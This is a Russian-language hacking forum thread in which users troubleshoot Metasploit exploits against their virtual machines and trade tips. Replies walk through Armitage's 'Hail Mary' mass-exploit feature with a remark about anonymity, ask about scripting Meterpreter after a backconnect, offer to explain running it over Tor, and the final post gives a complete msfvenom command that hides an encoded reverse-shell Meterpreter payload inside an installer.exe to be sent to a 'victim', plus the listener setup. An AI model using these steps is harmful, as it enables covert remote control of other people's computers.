недавно для себя открыл эту платформу, чето пробую тестировать у себя на виртуалках но ниче не выходит, услышал со стороны такое мнение что метасплоит не работает на бесплатной основе (юзаю настроеный в backtrack, kali), тоисть дырки видны експлоиты также но сделать оно ниче не дает вот отсюда вопрос знающих лючей насколько эта информация дествительна ? проблема в кривых руках или оно дествительно бесплатно работать не будет и лучше в ручнуюу искать эксплоит и пробовать заюзать без платформы метасплоит ?
так бак трак или kali. Плюнь в лицо кто тебе сказал что бесплатная версия не работает. Думаю тут мало у кого есть 5000 на покупку его. метасплоит это лишь удобный запуск эксплоита.
ну типа все пашет, но заюзать дырку не дает, может канешно и дырка на цевой машине запатчена, открытый порт это же еще не дырка ) но вот стал перед делемой штормить ли дальше метасплоит или делать ручками мучаю также армитаж, вроде он все находит, говорит дыры есть и не одна но ни один эксплоит не срабатывает (( вот и хотелось бы услышать что ктото реально заюзал из этих сборок чтото и что все пашет
Можешь на первое время (да и в целом) облегчить себе задачу - накатить GUI к Metasploit Framework+Nmap - Armitage. Тогда весь процесс можно свести к следующему алгоритму: 0. Hosts -> Add hosts. 1. Scan. 2. Attacks -> Find Attacks. 3. Attacks ->Hail Mary Spoiler Если речь идет о обговоренном заранее пентесте, иначе использование этого модуля приведет к запуску всех подходящих эксплойтах из шага "2", что не очень хорошо в плане анонимности. 4. Смотрим результат. Могу выложить с картиночками из личной практики. В принципе для того, чтобы потестить на устойчивость к паблику - этого хватит. Так же здесь можно проверить на наличие всяких дефолтных учеток Spoiler а-ля lbacsys/lbacsys в Oracle Database. Но это все ближе непосредственно к сетевым сервисам. Если тебя интересует web - то есть много других инструментов.
Дело действительно заключается в ровности рук, gosmir верное дело подсказал юзай Armitage он сильно упрощает и без того не сложный процесс. З.Ы. Сам юзал его по началу когда столкнулся с подобной проблемой.
Господа, дабы не плодить тем, не подскажете по метерпретеру? Как-то мимо меня это прошло.. Есть ли возможность настройки/написания скрипта, который бы выполнялся для метепретера автоматически после бэкконекта? Предположим, я хочу запустить powershell скрипт с помощью команды shell. Или вывести в консоль(в БД) инфу о системе(sysinfo)? А потом, допустим, создать директорию(mkdir) и перезагрузится? Т.е. хотелось бы оперировать именно командами метерпретерами с небольшой своей логикой. И все это автоматически.. Заранее спасибо. ПС могу рассказать как юзать метерпретер через тор.
Перед тем как начать работу в Metasploit : - надо разобраться в exploit ; - проверить LHOST <ip> (прописать ifconfig ); - LPORT 8080 (443, 6666) порт очень важен ; msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.73.128 LPORT=4444 -e x86/shikata_ga_nai -i 10 -x /root/Desktop/installer.exe -f exe > /root/Desktop/installer.exe отправить файл на VICTIM OS (жертва) msfconsole use exploit/multi/handler set Payload windows/meteroreter/reverse_tcp set LHOST xxx.xxx.x.x set LPORT 8080 exploit